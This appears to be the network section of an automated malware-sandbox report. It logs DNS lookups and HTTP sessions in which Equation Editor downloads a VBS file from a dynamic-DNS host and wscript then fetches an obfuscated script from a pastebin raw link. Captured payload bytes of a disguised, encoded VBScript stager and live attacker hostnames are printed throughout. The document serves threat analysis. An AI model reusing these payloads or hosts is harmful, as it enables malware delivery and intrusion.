Apr 24, 2024 07:32:54.622144938 CEST	192.168.2.22	8.8.8.8	0x2d73	Standard query (0)	ajai.ydns.eu	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:54.926876068 CEST	192.168.2.22	8.8.8.8	0x2d73	Standard query (0)	ajai.ydns.eu	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:55.410087109 CEST	192.168.2.22	8.8.8.8	0x2d73	Standard query (0)	ajai.ydns.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 07:32:37.205791950 CEST	8.8.8.8	192.168.2.22	0xaebf	No error (0)	blessy.ydns.eu	5.182.211.151	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.551584005 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.551584005 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.551584005 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.729039907 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.729039907 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.729039907 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.901781082 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.901781082 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:39.901781082 CEST	8.8.8.8	192.168.2.22	0x9671	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:44.069077969 CEST	8.8.8.8	192.168.2.22	0x205f	No error (0)	uploaddeimagens.com.br	172.67.215.45	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:44.069077969 CEST	8.8.8.8	192.168.2.22	0x205f	No error (0)	uploaddeimagens.com.br	104.21.45.138	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:54.392231941 CEST	8.8.8.8	192.168.2.22	0x2d73	No error (0)	ajai.ydns.eu	23.226.132.239	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:54.564074993 CEST	8.8.8.8	192.168.2.22	0x2d73	No error (0)	ajai.ydns.eu	23.226.132.239	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:54.792591095 CEST	8.8.8.8	192.168.2.22	0x2d73	No error (0)	ajai.ydns.eu	23.226.132.239	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:55.409745932 CEST	8.8.8.8	192.168.2.22	0x2d73	No error (0)	ajai.ydns.eu	23.226.132.239	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:32:55.581137896 CEST	8.8.8.8	192.168.2.22	0x2d73	No error (0)	ajai.ydns.eu	23.226.132.239	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

uploaddeimagens.com.br

blessy.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	5.182.211.151	80	1932	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 07:32:37.513717890 CEST	321	OUT	GET /jimbo/prnportjjm.vbs HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: blessy.ydns.eu Connection: Keep-Alive
Apr 24, 2024 07:32:37.808244944 CEST	1289	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 05:32:37 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31 Last-Modified: Tue, 23 Apr 2024 08:14:24 GMT ETag: "1bdba-616bf245b56f9" Accept-Ranges: bytes Content-Length: 114106 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: ff fe 0d 00 0a 00 27 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 63 00 6f 00 62 00 72 00 61 00 6e 00 63 00 69 00 73 00 74 00 61 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 4c 00 69 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 32 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 70 00 65 00 64 00 65 00 72 00 6e 00 61 00 6c 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 33 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 65 00 73 00 70 00 65 00 72 00 74 00 61 00 6d 00 65 00 6e 00 74 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 34 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6d 00 61 00 74 00 61 00 64 00 6f 00 69 00 72 00 6f 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 35 00 0d 00 0a 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 61 00 6c 00 6c 00 61 00 6d 00 61 00 6e 00 64 00 61 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4b 00 45 00 72 00 72 00 6f 00 72 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 46 00 6c 00 61 00 67 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 72 00 55 00 70 00 64 00 61 00 74 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6d 00 6f 00 64 00 65 00 72 00 6e 00 61 00 64 00 61 00 6d 00 65 00 6e 00 74 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 72 00 6f 00 6f 00 74 00 5c 00 63 00 69 00 6d 00 76 00 32 00 22 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 43 00 6f 00 6e 00 73 00 74 00 61 00 6e 00 74 00 73 00 20 00 66 00 6f 00 72 00 20 00 74 00 68 00 65 00 20 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 20 00 64 00 69 00 63 00 74 00 69 00 6f 00 6e 00 61 00 72 00 79 00 0d 00 0a 00 27 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 66 00 65 00 72 00 6e 00 61 00 6e 00 64 00 69 00 6e 00 61 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 66 00 61 00 67 00 75 00 65 00 69 00 72 00 6f 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 32 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 44 00 6f 00 75 00 62 00 6c 00 65 00 53 00 70 00 6f 00 6f 00 6c 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 33 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 50 00 6f 00 72 00 74 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 34 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 50 00 6f Data Ascii: 'const cobrancista = 0const kActionDelete = 1const kActionList = 2const pedernal = 3const espertamente = 4const matadoiro = 5const allamanda = 0const KErrorFailure = 1const kFlagCreateOrUpdate = 0const modernadamente = "root\cimv2"'' Constants for the parameter dictionary'const fernandina = 1const fagueiro = 2const kDoubleSpool = 3const kPortNumber = 4const kPo
Apr 24, 2024 07:32:37.808480978 CEST	1289	IN	Data Raw: 00 72 00 74 00 54 00 79 00 70 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 35 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 48 00 6f 00 73 00 74 00 41 00 64 00 64 00 72 00 65 00 73 00 73 00 20 00 20 00 20 00 20 Data Ascii: rtType = 5const kHostAddress = 6const kSNMPDeviceIndex = 7const kCommunityName = 8const kSNMP
Apr 24, 2024 07:32:37.808557987 CEST	1289	IN	Data Raw: 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 4f 00 70 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 4f 00 70 00 65 00 Data Ascii: const L_Operation_Text = "Operao"const L_Provider_Text = "Provedor"const L_Description_Text
Apr 24, 2024 07:32:37.808598042 CEST	1289	IN	Data Raw: 00 65 00 63 00 69 00 66 00 69 00 63 00 61 00 64 00 61 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6a 00 61 00 72 00 6f 00 20 00 20 00 20 00 3d 00 20 00 22 00 2d 00 67 00 20 00 20 00 20 00 20 00 20 00 2d 00 20 00 6f 00 62 00 74 00 65 Data Ascii: ecificada"const jaro = "-g - obter configurao para uma porta TCP"const belicoso = "-h - endereo IP do
Apr 24, 2024 07:32:37.808671951 CEST	1289	IN	Data Raw: 20 00 20 00 20 00 2d 00 20 00 6e 00 6f 00 6d 00 65 00 20 00 64 00 6f 00 20 00 73 00 65 00 72 00 76 00 69 00 64 00 6f 00 72 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6a 00 6f 00 6e 00 67 00 61 00 72 00 20 00 20 00 20 00 3d 00 20 00 Data Ascii: - nome do servidor"const jongar = "-t - definir configurao para uma porta TCP"const beato = "-u - nom
Apr 24, 2024 07:32:37.808763027 CEST	1289	IN	Data Raw: 00 74 00 20 00 2d 00 74 00 20 00 2d 00 73 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 20 00 2d 00 72 00 20 00 49 00 50 00 5f 00 31 00 2e 00 32 00 2e 00 33 00 2e 00 34 00 20 00 2d 00 6d 00 65 00 20 00 2d 00 79 00 20 00 70 00 75 00 62 00 6c 00 69 Data Ascii: t -t -s server -r IP_1.2.3.4 -me -y public -i 1 -n 9100"const mordomear = "prnport -g -s server -r IP_1.2.3.4"const
Apr 24, 2024 07:32:37.808835030 CEST	1289	IN	Data Raw: 65 00 20 00 73 00 63 00 72 00 69 00 70 00 74 00 20 00 64 00 65 00 76 00 65 00 20 00 73 00 65 00 72 00 20 00 65 00 78 00 65 00 63 00 75 00 74 00 61 00 64 00 6f 00 20 00 61 00 20 00 70 00 61 00 72 00 74 00 69 00 72 00 20 00 64 00 6f 00 20 00 70 00 Data Ascii: e script deve ser executado a partir do prompt de comando usando CScript.exe."const L_Help_Help_Host02_Text = "Por
Apr 24, 2024 07:32:37.808938026 CEST	1289	IN	Data Raw: 00 69 00 6e 00 61 00 64 00 6f 00 2e 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 54 00 65 00 78 00 74 00 5f 00 45 00 72 00 72 00 6f 00 72 00 5f 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c 00 30 00 32 00 5f 00 54 00 65 00 78 Data Ascii: inado."const L_Text_Error_General02_Text = "No possvel analisar a linha de comando."const vulcanismo = "Cdigo
Apr 24, 2024 07:32:37.808976889 CEST	1289	IN	Data Raw: 72 00 61 00 6c 00 30 00 38 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 50 00 6f 00 72 00 74 00 61 00 20 00 65 00 78 00 63 00 6c 00 75 00 ed 00 64 00 61 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 Data Ascii: ral08_Text = "Porta excluda"const L_Text_Msg_General09_Text = "No foi possvel obter o objeto SWbemLocator"con
Apr 24, 2024 07:32:37.809031010 CEST	1289	IN	Data Raw: 00 3d 00 20 00 22 00 43 00 6f 00 6e 00 74 00 61 00 67 00 65 00 6d 00 20 00 64 00 65 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 61 00 74 00 69 00 76 00 61 00 64 00 61 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 54 00 65 Data Ascii: = "Contagem de bytes ativada"const L_Text_Msg_Port09_Text = "Contagem de bytes desativada"const L_Text_Msg_Port
Apr 24, 2024 07:32:38.102127075 CEST	1289	IN	Data Raw: 65 00 78 00 74 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 79 00 6e 00 61 00 6d 00 69 00 73 00 74 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 7a 00 61 00 6e 00 67 00 61 00 0d 00 0a 00 Data Ascii: ext dim dynamista dim zanga dim oParamDict ' ' Abort if the host is not cscript '

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	172.67.19.24	443	3076	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 05:32:40 UTC	311	OUT	GET /raw/yk0CXsC5 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: pastebin.com Connection: Keep-Alive
2024-04-24 05:32:41 UTC	388	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 05:32:41 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Wed, 24 Apr 2024 05:32:41 GMT Server: cloudflare CF-RAY: 8793b6d17ebc69e3-LAS
2024-04-24 05:32:41 UTC	981	IN	Data Raw: 33 35 35 32 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 6f 75 76 69 73 74 6f 20 2c 20 67 72 61 63 69 6f 73 6f 20 2c 20 62 75 61 6d 61 20 2c 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 2c 20 64 69 76 69 64 69 72 20 2c 20 43 61 6d 61 20 2c 20 64 69 76 69 64 69 72 31 0d 0a 20 20 20 20 20 67 72 61 63 69 6f 73 6f 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 62 75 61 6d 61 20 20 3d 20 22 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 Data Ascii: 3552 dim ouvisto , gracioso , buama , presidencial , dividir , Cama , dividir1 gracioso = " " buama = "" & presidencial & gracioso & presidencial & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8Dg
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 69 61 6c 20 26 20 22 51 42 75 44 67 54 72 65 48 51 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 44 67 54 72 65 42 45 44 67 54 72 65 47 45 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 45 44 67 54 72 65 44 67 54 72 65 4b 44 67 Data Ascii: ial & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & presidencial & gracioso & presidencial & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & presidencial & gracioso & presidencial & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDg
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 34 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 4b 51 44 67 54 72 65 67 44 67 54 72 65 48 30 44 67 54 72 65 49 44 67 54 72 65 42 6a 44 67 54 72 65 47 45 44 67 54 72 65 64 44 67 54 72 65 42 6a 44 67 54 72 65 47 67 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 59 77 42 76 44 67 54 72 65 47 34 44 67 54 72 65 64 44 67 54 72 65 42 70 44 67 54 72 65 47 34 44 67 54 72 65 64 51 42 6c 44 67 Data Ascii: DgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDg
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 77 44 67 54 72 65 73 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 Data Ascii: wDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & presidencial & gracioso & presidencial & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & presidencial & gracioso & presidencial & "QBuDgTreHMDgTreLg
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 44 67 54 72 65 70 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 65 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 77 42 6c 44 67 54 72 65 46 51 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 46 51 Data Ascii: DgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTre" & presidencial & gracioso & presidencial & "wBlDgTreFQDgTre" & presidencial & gracioso & presidencial & "QB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQ
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 50 44 67 54 72 65 47 59 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 34 Data Ascii: reGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTre" & presidencial & gracioso & presidencial & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & presidencial & gracioso & presidencial & "QB4
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 61 6c 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 72 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 34 44 67 54 72 65 54 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 77 42 30 44 67 54 72 65 47 67 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 59 67 42 68 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 70 72 65 73 69 Data Ascii: al & "DgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTre" & presidencial & gracioso & presidencial & "wB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTre" & presi
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 45 4d 44 67 54 72 65 62 77 42 75 44 67 54 72 65 48 59 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 58 51 44 67 54 72 65 36 44 67 54 72 65 44 6f 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 43 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 72 65 73 69 Data Ascii: reCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTre" & presidencial & gracioso & presidencial & "QByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre" & presi
2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 67 54 72 65 47 30 44 67 54 72 65 22 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 67 72 61 63 69 6f 73 6f 20 26 20 70 72 65 73 69 64 65 6e 63 69 61 6c 20 26 20 22 51 44 67 54 72 65 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 62 51 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 30 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 34 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 54 51 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 4b 44 67 Data Ascii: gTreG0DgTre" & presidencial & gracioso & presidencial & "QDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDg
